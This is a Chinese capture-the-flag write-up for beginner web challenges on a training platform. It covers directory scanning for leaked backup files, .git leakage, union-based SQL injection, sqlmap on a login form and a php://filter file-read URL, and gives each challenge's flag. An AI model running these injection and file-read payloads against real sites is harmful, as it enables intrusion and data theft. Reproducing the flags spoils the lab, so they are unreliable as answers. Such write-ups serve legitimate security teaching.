[第一章 web入门]
常见的搜集
首先,打开页面源代码,没有发现任何价值信息。根据提示,猜测可能是敏感文件泄漏,直接上dirsearch扫描。
下载地址:
https://github.com/maurosoria/dirsearch
扫描出来有:/robots.txt,访问得到如下的内容,
继续访问/flag1_is_her3_fun.txt,得到部分flag1
访问index.php~ 得到flag2
dirsearch 扫描结果还有
/.index.php.swp
下载下来之后得到flag3
最后拼接flag
n1book{info_1s_v3ry_imp0rtant_hack}
粗心的小李
git泄漏,二话不说,直接上GitHack-master
python GitHack.py http://7f12c0b8-2555-49ec-a784-4950c3a6081c.node3.buuoj.cn/.git
打开下载下来的index.html找到flag
flag:n1book{git_looks_s0_easyfun}
SQL注入-1
一看是GET型
测试是否存在注入:?id=1’ and 1=1–+ 正常,?id=1’ and 1=2–+ 报错,存在注入
?id=1’ order by 3 --+ 正常,?id=1’ order by 4 --+ 报错,说明有3列数据
?id=-1’ union select 1,2,database() --+ 联合查询显示数据库名称:
-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x6e6f7465 --+
爆出表名
-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x666c3467 --+
爆出列名
-1’ union select 1,2,fllllag from note.fl4g --+
得到flag
n1book{union_select_is_so_cool}
SQL注入-2
1.根据提干,访问login.php
在网页源码中,看到
废话不多说,直接bp抓包
经过测试发现,当用户名输入 admin的时候,提示“用户名或密码错误”,当用户名输入其他任意内容时候,提示“用户不存在”,因此判断此处username可能存在注入点。
直接上sqlmap
爆出flag为如下:
flag:
n1book{login_sqli_is_nice}
afr_1
利用这一个知识点:
php://filter
是读取源代码并进行base64编码输出,可以看到源代码内容。
http://70a5ab0d-2226-44a2-bda6-52bd217f220d.node3.buuoj.cn/?p=php://filter/convert.base64-encode/resource=flag
base64解码得到flag: